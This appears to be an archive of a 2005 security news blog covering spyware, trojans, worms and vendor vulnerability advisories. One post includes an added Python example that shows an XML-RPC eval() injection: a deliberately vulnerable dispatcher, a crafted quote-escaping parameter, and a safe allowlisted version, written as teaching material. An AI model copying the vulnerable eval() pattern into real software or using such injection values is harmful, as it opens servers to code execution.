-- Adware, spyware, and spam continue to propagate, according to the report. Eight of the top 10 adware programs were installed through Web browsers. Of the top 10 adware programs reported, five hijacked browsers. Six of the top 10 spyware programs were bundled with other programs and six were installed through Web browsers. Symantec also observed that spam made up 61% of all e-mail traffic and that 51% of all spam received worldwide originated in the United States.
-- An analysis of future and emerging trends concluded that an increase in the number of attacks and threats directed at wireless networks is likely. In addition, Voice over Internet protocol (VoIP) threats are expected to emerge as more enterprises merge their data and voice networks. "Full Article"
Mac users are "operating under a false sense of security," according to Symantec Corp., and Firefox users will have to recognize that the popular open-source Web browser is currently a greater security risk than Microsoft Corp.'s Internet Explorer.
Symantec's latest Internet Security Threat Report, published today, found evidence that attackers are beginning to organize for attacks on the Mac operating system. Researchers also found that over the past six months, nearly twice as many vulnerabilities surfaced in Mozilla browsers as in Explorer.
"It is now clear that the Mac OS is increasingly becoming a target for the malicious activity, contrary to popular belief that the Mac OS is immune to traditional security concerns," the report said. "Full Article"

Thursday, September 08, 2005
Microsoft Corp. has alerted users to a problem in Windows Firewall that could be exploited by attackers as part of a broader system infection. The problem means that Windows Firewall can be made to hide certain information from the user, Microsoft said.
The bug isn't itself a vulnerability, Microsoft said in an advisory last week, since it can't be used to invade a system. It is, rather, an "unexpected behavior" that an attacker could use to cover up malicious activity, Microsoft said.
The company issued a patch for the problem, available only to authenticated Windows users.
The flaw is in the way Windows Firewall displays exception entries, which are created by administrators to allow incoming network connections. If an exception is created in the registry, it won't be displayed in the Windows Firewall user interface, meaning users might not be able to spot the exception entry.
It's unlikely that such a registry entry would be created under ordinary circumstances, and a user couldn't create one without administrator privileges, Microsoft said.
"It is more likely that an attacker who has already compromised the system would create such malformed registry entries with intent to confuse a user," Microsoft said in the advisory.

Wednesday, September 07, 2005
Below was sent via email claiming to be from Google. Please do not click on the link included at the bottom of the email. It takes you to a site called "Dan-Trade.US". Do not go to this site! The purpose of this article is to warn people not to visit this site as long as they are inserting things into people's machines.
This site "Dan-Trade.US" is trying to insert malware into your machine. The site should be shut down until it is cleaned up, if they are not purposefully inserting it. If they are, the police should shut it down. If they get it cleaned up we will be happy to post a site clean-up notice.
New Orleans police urging people away
New Orleans Deputy Police Chief Warren Riley, in the department's first news conference since the storm, said one of the greatest current challenges is persuading thousands of remaining people to leave their homes in a city without any municipal services and no prospect of any for months.
"What our officers are telling people is that there is absolutely no reason to stay here," he said. "There are no jobs. There are no homes to go to, no hotels to go to. There is absolutely nothing here. We advise that the city has been destroyed."
As many as 10,000 people were thought to have been left behind — or chosen to stay.

Thursday, August 25, 2005

When you install anything, be sure you know it is clean. Please don't put this garbage in your machine in the first place. Love the quote at Block-Checker.com, "proud to be spyware free". Sure. Yet the only way we learned of the product was through McAfee; this is clearly a good sign.
Virus Characteristics
This Trojan lowers internet security settings, adds itself to firewall exclusion policies and downloads multiple adwares.
It adds itself to Add Remove Program with the names "Block-checker 1.0" and "System Process". If the user tries to uninstall "System Process", this Trojan attempts to download various adwares on the system. This is related to Block-Checker.com.
Upon installation the program displays a EULA. The privacy policy is located at
http://www.system-processes.com/liscense.php
It is observed to contact the following sites, apart from various other adware sites that it downloads.
See McAfee for details

Wednesday, August 24, 2005

Court approves AhnLab's spyware classification
The Southern District Court of Seoul ruled this week that AhnLab's detection and labelling as spyware of the product of software company Digital Names is justified.
The court rejected a petition filed by Digital Names to stop the distribution of AhnLab's anti-spyware product SpyZero, ruling that the spyware label was appropriate since the program in question reinstalls itself automatically even after deletion.
Bravo at least a court somewhere has the nerve to take on these parasites.

Tuesday, August 23, 2005
US-Cert has published a report on spyware, http://www.us-cert.gov/reading_room/spyware.pdf, a 15-page document that includes an overview, definition and examples of different types of threats. Some of the recommended defensive measures include the following:
- Don't trust unknown or known high-risk sources.
- Read the fine print.
- Pay attention when installing applications.
- Keep operating systems and software patched.
- If you are running Windows XP, install Service Pack 2.
- Use trusted anti-virus and anti-spyware tools.
- Alternative internet applications.
- Browser configuration.
Computer Associates announced a 6.9 million dollar contract to protect Department of Defense (DOD) computers from spyware. The need for the contract indicates spyware has infected military computers. From an article on FCW.com about antispyware software at Fort Hood, just read the quote from Army Maj. Bert Belisch:
Unlike with viruses, no one has offered the public a complete catalog of spyware threats. And until that happens, we're left with a lot of hype and fear instead of facts and solutions. In short, despite all the antispyware apps being produced these days, we're no closer to eradicating the spyware problem.
Antispyware vendors typically use three types of databases. Some use a community database, which is drawn from subscribers who report suspected spyware. It was reported by Cnet that Microsoft uses Skynet for its spyware collection. Webroot (makers of SpySweeper) primarily uses its Phileas technology to crawl all over the Internet and find new examples of spyware. Finally, there are hybrid databases, combining the above two methods.
Then there is the total failure of The Consortium of Anti-Spyware Technology vendors (COAST), a group founded by PestPatrol (now part of Computer Associates), Webroot (makers of SpySweeper), and Aluria (makers of Spyware Eliminator); the group ceased to exist a few months ago after vicious in-fighting regarding the very definition of spyware. What interest, then, does anyone have in even defining what it is? As long as it is all driven by money there is no serious solution. The rambling will simply continue and every consumer will suffer.
Opinion: Nobody who takes security seriously could get hit through the Windows 2000 PnP vulnerability, yet lots of large corporations were hit. You do the math.
Quotes From Larry Seltzer
August 16, 2005
After reading both of Larry Seltzer's posts on the 16th about patch MS05-039, which MS released on August 9th, it really is amazing that, while this seemed to be a straightforward worm easy enough to prevent, it was all over the network news channels as if it were terminal.
Everything he said in his column about mitigating factors on this vulnerability holds: "the stupidest firewall in the world would block this worm from spreading and only Windows 2000 systems are vulnerable". I also liked the possible cause.
"So it makes sense that it's Fortune 500 corporations that are being attacked, since they are the heartland for Windows 2000 usage. Of course, all these companies have firewalls at their perimeters, so the attack had to come from the inside. It's a cliche in the security business by now, but someone took their unpatched, unfirewalled Windows 2000 system out into the real world and got it infected with this worm. Then they took it back to the office, plugged it in and logged on, and soon everyone else on the network segment was hit hard." As he stated, it is 'NOT' the only possible cause, though a likely one.
New Worms Catch Big Business With Pants Down
August Patch Winds Fade

Monday, August 22, 2005

CVE Reference : GENERIC-MAP-NOMATCH
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2005-08-21
* Technical Description *
Multiple vulnerabilities were identified in various Computer Associates products, which may be exploited by remote or local attackers to execute arbitrary commands or cause a denial of service.
The first issue is due to an unspecified error in the CAM messaging sub-component, which could be exploited by remote attackers to cause a denial of service.
The second flaw is due to a buffer overflow error in the CA Message Queuing Server that does not properly handle specially crafted requests, which could be exploited by remote attackers to execute arbitrary commands with SYSTEM privileges.
The third vulnerability is due to an unspecified error in the CAFT application that does not properly handle specially crafted messages, which could be exploited by attackers to execute arbitrary commands.
(platforms : AIX, DG Intel, DG Motorola, DYNIX, OSF1, HP-UX, IRIX, Linux Intel, Linux s/390, Solaris Intel, Solaris Sparc, UnixWare, Windows, Apple Mac, AS/400, MVS, NetWare, OS/2 and OpenVMS).
* Solution *
Fixes for CAM v1.11 prior to Build 29_13 :
http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_cam111fixes.asp
Fixes for CAM v1.07 prior to Build 220_13 :
http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_cam107fixes.asp
Fixes for CAM v1.05 (any version) :
http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_cam107fixes.asp
* References *
http://www.frsirt.com/english/advisories/2005/1482
http://supportconnectw.ca.com/public/ca_common_docs/camsecurity_notice.asp

Saturday, August 20, 2005

Original release date: 8/19/2005
Source: US-CERT/NIST
Incomplete blacklist vulnerability in the checkBlacklist function in CPAINT allows remote attackers to execute arbitrary commands via the (1) ExecuteGlobal function or (2) GetRef statement, which is not included in the blacklist.
Severity: High
Range: Remotely exploitable
Impact Type: Provides user account access
External Source: BUGTRAQ (disclaimer)
Name: 20050816 RE: Vulnerability found in CPAINT Ajax Toolkit
Type: Advisory
Hyperlink: http://marc.theaimsgroup.com/?l=bugtraq&m=112421484419768&w=2
CPAINT, CPAINT
Vulnerability Type: Input Validation Error
CVE Standard Vulnerability Entry:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2625
| Critical: | Highly critical |
| Impact: | System access |
| Where: | From remote |
| Solution Status: | Vendor Patch |
| Software: | Adobe Acrobat 5.x, Adobe Acrobat 6.x, Adobe Acrobat 7.x, Adobe Acrobat Reader 5.x, Adobe Reader 6.x, Adobe Reader 7.x |
| CVE reference: | CAN-2005-2470 |
Description: A vulnerability has been reported in Adobe Reader and Adobe Acrobat, which potentially can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an unspecified boundary error in the core application plug-in and can be exploited to cause a buffer overflow when a specially crafted file is opened.
Successful exploitation may allow execution of arbitrary code.
Solution: Install updated version.
Adobe Reader (Windows or Mac OS): Update to version 7.0.3 or 6.0.4.
Adobe Reader (Linux or Solaris): Update to version 7.0.1.
Adobe Acrobat (Windows or Mac OS): Update to version 7.0.3, 6.0.4, or 5.0.10.
Provided and/or discovered by: Reported by vendor.
Original Advisory: Adobe: http://www.adobe.com/support/techdocs/321644.html
Other References: US-CERT VU#896220: http://www.kb.cert.org/vuls/id/896220

| Critical: | Highly critical |
| Impact: | System access |
| Where: | From remote |
| Solution Status: | Vendor Workaround |
| Software: | Microsoft Internet Explorer 5.01, Microsoft Internet Explorer 5.5, Microsoft Internet Explorer 6.x |
| CVE reference: | CAN-2005-2127 |
Description: A vulnerability has been reported in Internet Explorer, which can be exploited by malicious people to compromise a vulnerable system.
The vulnerability is caused due to an error when the "msdds.dll" (Microsoft DDS Library Shape Control) COM object is instantiated in the Internet Explorer browser.
Successful exploitation allows execution of arbitrary code, but requires that a user is tricked into visiting a malicious web site.
The COM object is reportedly installed as part of the following products: Microsoft Visual Studio .NET 2002, Microsoft Visual Studio .NET 2003, Microsoft Office Professional 2003, Microsoft Office XP.
Other products may also include the affected COM object.
NOTE: An exploit has been published. However, there are currently conflicting reports about the exploitability of this issue. Some reports confirm that code execution is possible, while other reports indicate that the problem can't be reproduced. This indicates that only certain versions of the COM object may be affected. Secunia has currently not been able to reproduce the vulnerability in version 7.10.3077.0 of the COM object (included with Microsoft Office 2003 and Microsoft Visual Studio .NET 2003).
Solution: Restrict use of ActiveX controls to trusted web sites only. The vendor has various other workarounds documented in the original advisory. A non-vendor solution: kill bit workaround here.
Other news: eWeek article.
Changelog: 2005-08-18: Added Microsoft Office XP as affected. Added link to ISC. 2005-08-19: Added additional information from Microsoft.
Original Advisory: Microsoft (KB906267): http://www.microsoft.com/technet/security/advisory/906267.mspx http://support.microsoft.com/kb/906267
Other References: ISC: http://isc.sans.org/diary.php?date=2005-08-18
US-CERT VU#740372: http://www.kb.cert.org/vuls/id/740372

Thursday, August 18, 2005
Keyloggers are one of the most dangerous spyware parasites.
Activity of these usually small malicious programs is really catastrophic. Although keyloggers do not destroy the operating system or installed software and don't corrupt files, they steal the most valuable user information, including all the passwords, login names, everything written in priceless documents, every letter in a chat conversation or e-mail message.
A typical keylogger not only records all keystrokes, but also captures screenshots of user activity, logs software usage, the exact addresses of visited web sites, even mouse clicks and the time when the user turns off his computer, and quietly sends all gathered data to a predefined e-mail address. What can be worse? Keyloggers allow the attacker to be well informed about all your secrets, current work, contacts, interests, your entire life. However, you can prevent such an intervention. In most cases keystroke capture can be revealed and avoided. In this article I will give you several pieces of advice that you should always keep in mind.
Spying techniques
Depending upon the nature of the information gathered, each piece of spyware may function differently. Some spyware applications simply gather information about a user's surfing habits, purely for marketing purposes, while others are far more malicious. In any case, the spyware attempts to uniquely identify the information sent across a network by using a unique identifier, such as a cookie on the user's hard disk or a Globally Unique Identifier (GUID). [ref 2] The spyware then sends the logs directly to a remote user or a server that is collecting this information. The collected information typically includes the infected user's hostname, IP address, and GUID, along with various login names, passwords and other keystrokes. "Full article"
The National Institute of Standards and Technology (NIST) has unveiled its mega-database, otherwise known as the National Vulnerability Database. The NVD will issue daily updates on viruses that are wreaking havoc on popular software products and post notices on security trends.
The database was created as a means to warn users about security threats both big and small, according to a report in SecurityFocus.
NVD is a comprehensive cyber security vulnerability database that integrates all publicly available U.S. Government vulnerability resources and provides references to industry resources. It is based on and synchronized with the CVE vulnerability naming standard.

Saturday, August 06, 2005

Officials at Sunbelt Software, a Clearwater, Fla.-based vendor of antispyware tools, said the company stumbled upon a massive ID theft ring that is using a well-known spyware program to break into and systematically steal confidential information from an unknown number of computers worldwide.
The operation was discovered yesterday during research Sunbelt was doing on a spyware program belonging to a particularly dangerous class of browser hijacking tools called CoolWebSearch (CWS), according to Sunbelt's president, Alex Eckelberry.
CWS programs are extremely hard to detect and remove, and are used to redirect users to Web sites that use spyware tools to collect a variety of information from infected computers.
The CWS variant being researched by Sunbelt turned infected systems into spam zombies and uploaded a wide variety of personal information to a remote server apparently located in the U.S. That server holds a "treasure trove of information" for ID thieves, Eckelberry said.
Sunbelt's research showed that the information being uploaded to the remote server included chat sessions, user names, passwords and bank information, he said. The bank information included details on one company bank account with more than $350,000 in deposits and another belonging to a small California company with over $11,000 in readily accessible cash, he said.
Full Article here | Removing and detecting

Tuesday, July 19, 2005
While Distribution is not high, Damage Level is Extremely High.

We have written many articles on the subject of key loggers. We view these as one of the highest possible threats, as hackers are looking over your shoulder, so to speak. You typically have to go through a lot to remove or detect them. Unlike a virus, these keyloggers make your machine one of the most dangerous places to store your confidential information.
We as computer users find every country in the world seems unwilling to react to the threat these little applications pose. The fact is you could be being watched right now without your knowledge. People think the internet is safe. However, opening attachments and browsing the web at a cyber cafe or on a WIFI network, or even doing a web search, may make you the target of the type of people who look at you as nothing more than a mark.
We want to warn that just doing a web search for keyloggers can start the process of stealing your identity. This is a very spooky thing indeed. Personally, one would think that any web site that is allowed to inject such a thing into your computer without your knowledge should be shut down and all the people rounded up and taken off to prison.
We should all demand that any web site indexed by the search engines which does any type of popup request be dropped at once from the search engine's index. This action would not allow indexing of the domain again for 90 days. Yes, this would be rude, we admit. Overnight we would cut the internet risks. After all, the majority of proper business people do not, or should not, use popups, and people of course should have their machines configured so that these things do not insert without their knowledge. Honestly though, it is a case where people who are ignorant of these things are the prime targets.
We also know from a technical standpoint that asking a search engine like Google, Yahoo, or MSN to do this with their spiders is asking a lot. Let me say it a different way then. If you do it you will have the winning search engine on the web. Money is the driving force for the web; having the safest search sounds like a winner. Any search engine which says it is technically too difficult would not be used and will die on the vine. "Safe Searching": what a concept. No police force seems to have a clue. So what about the white hats, are you all just overwhelmed with defense?
The internet was designed and built by basically honest people. It is this type of mindset that seems to have given criminals a place to prey on others. If something is not done, honestly, the numbers of people who ran to the web and its technology will simply leave. After all, there was life before the web. Not changing will simply make people avoid it again, saying we are not smarter than the bad guys. We are sure everyone could just blame Microsoft for all the world's problems and move away. However, this is a bigger issue than that.
Removal Instructions for this
Extremely High Distribution

Yet another of the family of Mytob worms. The removal tool gives a list of the viruses it will remove.
We have given this a very high threat level since we are seeing large numbers of these trying to transit our mail servers.
W32.Mytob@mm is a mass-mailing worm that opens a back door and lowers security settings on the compromised computer.
| Also Known As: | Net-Worm.Win32.Mytob.bi [Kaspersky Lab], W32/Mytob.gen@MM [McAfee], WORM_MYTOB.FH [Trend Micro] |
| Type: | Worm |
| Infection Length: | 45,320 bytes |
| Systems Affected: | Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP |

Friday, July 08, 2005

A highly critical vulnerability has been found in XML-RPC (XML Remote Procedure Call), which impacts many open source applications that use the vital software component. The flaw could allow an attacker to take control of a vulnerable Web server.
Open source projects and Linux vendors alike have issued advisories and updates, and the SANS Internet Storm Center has warned that the flaw could trigger an epidemic.
XML-RPC is a set of implementations based on a specification originally drafted by Dave Winer, who's credited with creating RSS. XML-RPC is a cross-platform spec that allows software to make procedure calls using XML for encoding and HTTP for transport.
The vulnerability has been found in PHP implementations of XML-RPC from both the PHPXMLRPC and PEAR (the PHP Extension and Application Repository) download sites, which are included in "dozens" of applications written in PHP, according to the advisory.
The XML-RPC implementations are at a "very high risk" from the PHP code execution vulnerability, according to security firm GulfTech Research, which reported the flaw late last week.
GulfTech Research said "the vulnerability is the result of unsanitized data being passed directly into an eval() call in the parseRequest() function of the XMLRPC server."
GulfTech's advisory goes on to note that an attacker could easily execute exploit PHP code on the target server by creating an XML file that includes single quotes in order to escape into the eval() call.
PEAR and PHPXMLRPC have issued updates to fix the issue. Various blog, wiki and content management system (CMS) packages that utilize the XML-RPC libraries have issued advisories to their users to update as well. Among the many affected programs are Serendipity, phpAdsNew, phpWiki, PostNuke, WordPress, Drupal, phpMyFAQ, b2evolution, TikiWiki, phpGroupWare and BLOG:CMS.
Among Linux vendors, Gentoo and Mandriva issued advisories on the issue.
Over the weekend, the SANS Internet Storm Center warned that the XML-RPC flaw combined with the unpatched Microsoft IE flaw could lead to an Internet "storm".
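The pattern GulfTech describes, request data pasted into source text and handed to eval(), is easy to reproduce in any language. The block below is an added example written for this page, not code from PHPXMLRPC, PEAR or any affected application: it mimics the mistake in Python next to a dispatcher that treats request values purely as data. The method name demo.greet, the handler and the request are all constructed for the illustration; the injected value only glues two strings together, enough to show that a quote in the request changes what gets executed.

```python
"""Added example (not code from PHPXMLRPC/PEAR): string-built eval() beside a
data-only XML-RPC dispatcher. Method name, handler and request are constructed."""
import xmlrpc.client

# Constructed request. The second parameter carries a single quote followed by
# more code; a server that quotes parameters into source text will execute it.
REQUEST = """<?xml version="1.0"?>
<methodCall>
  <methodName>demo.greet</methodName>
  <params>
    <param><value><string>alice</string></value></param>
    <param><value><string>hi' + 'INJECTED</string></value></param>
  </params>
</methodCall>
"""


def greet(name, greeting):
    """Hypothetical handler registered under demo.greet."""
    return f"{greeting}, {name}"


# Explicit allowlist: the only way a request can reach code is through this map.
HANDLERS = {"demo.greet": greet}


def vulnerable_dispatch(xml):
    """Same mistake as the PHP parseRequest(): parameters are written into
    source text inside single quotes and the text is evaluated as code."""
    params, method = xmlrpc.client.loads(xml)
    handler = HANDLERS[method]
    code = handler.__name__ + "(" + ", ".join("'%s'" % p for p in params) + ")"
    # code is now: greet('alice', 'hi' + 'INJECTED')  -- the quote escaped
    return eval(code, {handler.__name__: handler})


def safe_dispatch(xml):
    """Parse with a real XML-RPC parser, look the method up in an allowlist,
    type-check the parameters and call the handler directly. No code is built."""
    params, method = xmlrpc.client.loads(xml)
    handler = HANDLERS.get(method)
    if handler is None:
        raise ValueError("unknown method: %r" % (method,))
    if not all(isinstance(p, str) for p in params):
        raise TypeError("string parameters expected")
    return handler(*params)


if __name__ == "__main__":
    print("vulnerable:", vulnerable_dispatch(REQUEST))
    print("safe:      ", safe_dispatch(REQUEST))
```

The vulnerable path returns "hiINJECTED, alice" because the quote in the parameter terminated the string literal and the rest was evaluated as an expression; the safe path returns the parameter verbatim, quote and all. The fix is the shape of the code, not a filter: once request values never become source text, quoting and escaping stop mattering.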
Microsoft has provided advance notice that three "critical" security bulletins will be released in this month's patch batch.
The bulletins will include patches for flaws in Microsoft Corp.'s flagship Windows operating system and the Microsoft Office desktop productivity suite.
As is customary, the software giant isn't providing any details until July 12, when the bulletins are posted.
The three updates represent a relatively small batch of patches, coming on the heels of last month's barrage when Microsoft shipped 10 bulletins, including a "critical" update for the Internet Explorer browser.
This time around, security researchers are expecting another cumulative IE patch to address a known code execution flaw in the widely deployed browser.
Over the last week, Microsoft has been providing pre-patch workarounds and mitigation guidance alongside warnings that potentially destructive exploit code has been posted on the Internet.
Microsoft typically includes IE patches under the Windows umbrella in its Security Bulletin Advance Notice mechanism. However, because IE patches require extensive testing, there have been long delays in the past to get a cumulative browser update out the door.
"When they're motivated to fix things quickly, they can," added Marc Maiffret of eEye Digital Security.
eEye maintains a list of unpatched security vulnerabilities and the time that has elapsed since each bug was first reported to Microsoft. According to Maiffret, there are four Microsoft flaws that have not been addressed, including one that is 40 days overdue.
Microsoft is also expected to release an updated version of its malicious software removal tool to add detection for new worms, Trojans and virus variants.
The company will also push out a non-security, high-priority update for Microsoft Office.

Thursday, July 07, 2005

A study released yesterday found that hackers and virus writers are recognizing and exploiting the opportunities presented by IM-based attacks, the numbers of which have risen sharply over the last two quarters.
The number of IM attacks such as viruses, worms, and phishing scams has increased from twenty for all of 2004 to 571 in the second quarter of 2005 alone, representing an increased threat to both enterprise users and the average consumer, the study from instant messaging security vendor IMlogic Inc. said.
The study, performed by the IMlogic Threat Center with the support of IT security companies Symantec Corp., McAfee Inc., and Sybari as well as IM leaders America Online Inc., Yahoo Inc., and Microsoft Corp., reported that 70% of IM-based attacks target public IM networks and 30% target enterprises.
"IM usage has reached critical mass and virus writers have now recognized it as a mostly undefended medium," said IMlogic CEO and co-founder Francis deSouza. "These [viruses and worms] are mutating, high velocity, and invisible to most companies until they hit. All these factors combine to create a serious risk."
IM attacks act much like e-mail worms and viruses, stealing information from the user's computer or turning that computer into a so-called zombie by tricking users into clicking on phony links or opening malicious attachments. IM-based attacks can be even more threatening because people receive false instant messages from a name on their buddy list rather than from a strange e-mail address, deSouza said.
"Having an army of zombies is the economic equivalent of having an oil well," said analyst Alan Paller of the SANS Institute. "The two most important things [for a user] to do are block all attachments on IM and to filter IM traffic so you only get it from trusted sites."
In corporate environments the Kelvir, Opanki and Gabby worms were the most common, the study said.
Some attacks are tailored to a specific user and appear to be, for instance, a highly personalized message. The study said that these attacks made up less than 1% of the recorded IM attacks. For the most part, IM attackers aren't sophisticated enough to single out any one user, Paller said. However rare "targeted" attacks may be, Paller emphasized that they are the most dangerous.
The vast majority -- 86% -- of reported attacks involved viruses or worms that capitalize on real-time protocols. The study showed that all of the most successful IM services -- AOL Instant Messenger, MSN Messenger, Windows Messenger, and Yahoo Messenger -- were vulnerable to IM attacks.
We also recommend running an anti-virus product such as NOD32, or the free editions from AVG or Avast; some of these offer real-time plug-in protection for IM clients and Outlook.

We are listing this threat as high so that people do not simply ignore the rating and fall prey to it.
Microsoft Corp. has released software that can be used to mitigate a critical vulnerability in Internet Explorer that was first reported last week.
The bug, which concerns the way Internet Explorer handles ActiveX components, can cause the browser to crash and could be used by an attacker to run unauthorized software on the user's machine, Microsoft said.
Yesterday, Microsoft released a tool that disables, through a registry setting, a COM object called Javaprxy.dll, which Internet Explorer uses to run these components. The file belongs to the Microsoft Java Virtual Machine, the company said.
Microsoft has not yet decided whether it will release a software patch that would fix the underlying problem, a spokeswoman said. "The work-around that they've offered here doesn't fix the underlying vulnerability, but it removes the functionality," she said.
Danish security company Secunia gave the vulnerability its most serious rating, calling it "extremely critical."
The Austrian security researchers who discovered the flaw expect Microsoft eventually to issue a full-blown patch.
"Right now, it's not that dangerous," said Martin Eisner, chief technical officer at security consulting company SEC Consult Unternehmensberatung GmbH. "But of course within a couple of weeks there will be somebody who has a little bit more time than we have and there will be an exploit then," he said in an interview last week.
Microsoft is unaware of any software that has exploited the bug, the spokeswoman said.
Microsoft has issued a security advisory that provides more details on the bug and lists other possible work-arounds to the problem.

Friday, July 01, 2005

Another new wave of spam that disguises itself as a Microsoft Corp. security bulletin contains a link to malicious software that gives attackers complete access to the infected machine, security researchers are reporting.
The e-mail, which began circulating late Tuesday, identifies itself as Microsoft Security Bulletin MS05-039 and offers a link to what it claims is a patch against the Sober, Zafi and Mytob worms.
In fact, there is no such thing as Microsoft Security Bulletin MS05-039, and real Microsoft security bulletins offer links to a Microsoft download site, rather than to the patches themselves, said Mikko Hypponen, director of antivirus research at F-Secure Corp.
The phony patch is a variant of the SDBot Trojan software, which is at present not detected by antivirus software products, according to a report from security research firm WebSense Inc.
The risk of someone downloading this Trojan appears to be very low right now, because the server hosting the Trojan downloads no longer appears to be active.

Microsoft late Thursday confirmed that a security flaw in its dominant Internet Explorer browser could potentially be exploited by malicious hackers to "take complete control of the affected system."
The software giant released a security advisory acknowledging the vulnerability and recommended that IE users set Internet and local intranet security zone settings to "High" before running ActiveX controls in these zones.
All supported versions of Internet Explorer, including IE 6.0 in Windows XP SP 2 (Service Pack 2) are affected.
Microsoft Corp.'s confirmation comes less than 24 hours after private security research firm SEC Consult published a working exploit showing that the bug could crash the browser or be exploited to execute arbitrary code in the context of IE.
Microsoft said it was not aware of any attacks attempting to use the reported vulnerability or customer impact and promised a patch would be made available once an investigation is completed.
"A COM object, javaprxy.dll, when instantiated in Internet Explorer can cause Internet Explorer to unexpectedly exit. We are investigating a potentially exploitable condition," Microsoft said in the advisory.
The company said a successful attacker could exploit the flaw by creating a malicious Web page and persuading the user to visit the page.
"An attacker could also attempt to compromise a Web site to have it display a Web page with malicious content to try to exploit this vulnerability."
Microsoft accused SEC Consult of publishing details and proof-of-concept that put customers at risk. However, the research outfit said it only posted the details after Microsoft said it could not confirm the existence of the flaw.
"Microsoft [did] not confirm the vulnerability, as their product team can not reproduce condition," SEC Consult said in an advisory. After the publication of SEC Consult's advisory, Microsoft later reproduced the issue and posted its advisory.
More information on suggested actions is available in Microsoft's security advisory.

Sunday, June 26, 2005
Consumers are confused about when to act on something their anti-spyware software has flagged as a threat, and even the companies who write the code cannot agree on anything.
It is hard to get all these products to work together and behave consistently. The burden is on the software providers who took on this business. What is needed is agreement on some basic standards that would let these applications make a defensible call. Vendors are beset by legal headaches, constantly challenged over what their products define and target as malware.
Many anti-spyware programs scour computer hard drives for the data-tracking files called cookies that we often pick up on Web visits. Microsoft Corp.'s tool does not. And there are disputes aplenty about whether certain widely used advertising programs circulating on the Internet are clean of spyware.
Surprise! There is little agreement on what should be considered spyware, or even on what adware is exactly, or on whether adware, which delivers ads, is a form of spyware or a breed apart. Honestly, one should question any right these companies have to collect this demographic information as a matter of law; one would think the right to privacy should win out. Once again money has won as a course of law, at least until consumer numbers force the issue.
Claria Corp., formerly known as Gator Corp., has sued several anti-spyware companies and Web sites for calling its advertising software "spyware." PC Pitstop rewrote some of its materials as part of a settlement.
Joseph Telafici, director of operations for McAfee Inc.'s security research unit, says the company now gets one or two complaints a week, compared with two or three per quarter last year from companies whose programs it has dubbed spyware or adware.
Symantec Corp. sought to pre-empt a lawsuit by filing one itself, asking a federal court to declare that it had the right to call Hotbot.com Inc.'s toolbar adware. Hotbot did not respond to requests for comment.
Symantec still faces a lawsuit by Trekeight LLC, whose product Symantec brands adware.
Adding to the confusion is the fact that many legitimate programs — including Microsoft Corp.'s Windows operating system and Web browser — send out data without making the user fully aware, one of the common attributes of spyware.
And many programs that spy, do have legitimate functions — people may run a keystroke recorder to monitor spouses whom they suspect of cheating. Or they may willingly accept adware in exchange for a free game or screensaver.
Anti-spyware software companies say they leave removal decisions to customers, though many users simply follow their recommendations, failing to distinguish the mild from the malicious.
Anti-spyware companies have an incentive to overlist programs.
Getting this issue resolved by some ruling, law or guideline will only push the adware and spyware companies to rebrand what they do under a new term. Then they will stand up in court and dare you to call them a spyware company, claiming instead to be "reportware", "searchware" or "sponsorware."

Saturday, June 25, 2005
REDMOND, Wash.--The random chatter of several hundred Microsoft engineers filled the cavernous executive briefing center recently at the company's sprawling campus outside Seattle.
Within minutes after their meeting was convened, however, the hall became hushed. Hackers had successfully lured a Windows laptop onto a malicious wireless network.
"It was just silent," said Stephen Toulouse, a program manager in Microsoft's security unit. "You couldn't hear anybody breathe."
Matt Thomlinson, whose job it is to help make Microsoft engineers create more secure code, noticed that some of the engineers were turning red, becoming obviously angry at the demo hacking incident. Yet as painful as the lesson was, he was glad to see the crowd of engineers taking things personally.
Thomlinson frequently makes similar entreaties to the engineers on the need for secure code, but he said his own lectures don't have the same effect. "It kind of hits people up here," Thomlinson said, pointing to his head. "Things are different when a group of programmers watches their actual code exploited. It kind of hits people in the gut."

Thursday, June 23, 2005

LONDON-- A new browser flaw could allow attackers to trick users into relinquishing sensitive information such as passwords. The flaw is unusual in that it affects every mainstream browser and can be exploited on the Mac OS X operating system as easily as on Windows, according to security company Secunia.
Because of the way most browsers handle JavaScript dialog boxes, it's unclear which site a dialog box originates from, Secunia reported. An untrusted site could direct a user to a secure site such as a bank, and then cause a dialog box to pop up in front of the bank site's window.
When the user entered password information, that data would be sent to the attacker, Secunia stated. "Successful exploitation normally requires that a user is tricked into opening a link from a malicious Web site to a trusted Web site," the company observed in its advisory.
Opera Patched
The flaw has been confirmed in Opera, Safari, Mozilla-based browsers, iCab, and Mac and Windows versions of Internet Explorer. As of Wednesday, only Opera had issued a patch, in version 8.01. The bug has been fixed in the beta of iCab version 3.0.
The Redmond software vendor also has pushed out its beta-expiration date for its pending product from July to December. What's going on?
Microsoft is slated to release to the Web in the next day or two a beta refresh of its Microsoft AntiSpyware product.
Some testers reported on Wednesday that they had downloaded a new beta version of Microsoft AntiSpyware (version number 1.0.613). They also reported that Microsoft had extended the beta-expiration date for the product from July 31, 2005, to December 31, 2005.
Microsoft officials confirmed that Microsoft had extended the beta period until the end of the year. Officials also acknowledged that the company has been testing on a selective basis the beta refresh number 1.0.613. (The current beta version number is 1.0.509.)
The pending refresh is not Beta 2, however, Microsoft executives said. Beta 2 will be released "some time later this year," they said.
"We are going through with a refresh of the (Microsoft AntiSpyware) beta," said Paul Bryan, director of product management with Microsoft's security technology and business unit. "We are testing this right now a bit, making sure that things are OK" before releasing to all testers.
Microsoft officially announced its plans to field a Microsoft-branded anti-spyware product (code-named "Atlanta") in January, following its purchase of Giant Software in December, 2004. The beta supports Windows 2000, Windows XP and Windows Server 2003.
Microsoft released a publicly available Beta 1, that was not much more than a repackaging of Giant's technology, on January 6. On February 16, Microsoft issued a beta refresh. Since then, the company has made available weekly "signature updates" of the product to interested testers.
This week's Microsoft AntiSpyware beta refresh will include a couple of new features, Bryan said.
The refresh is designed to alleviate "some issues" with Winsock/LSP (Layered Service Provider) removal. While Bryan said these were relatively low in number in the current beta, he admitted that they have played havoc with some testers' network connectivity when certain traffic-intercepting software is part of the network stack.
An ominous increase in scanning activity on TCP Port 445 could signal an impending mass malicious code attack targeting a recently patched Microsoft vulnerability, according to a warning from security researchers.
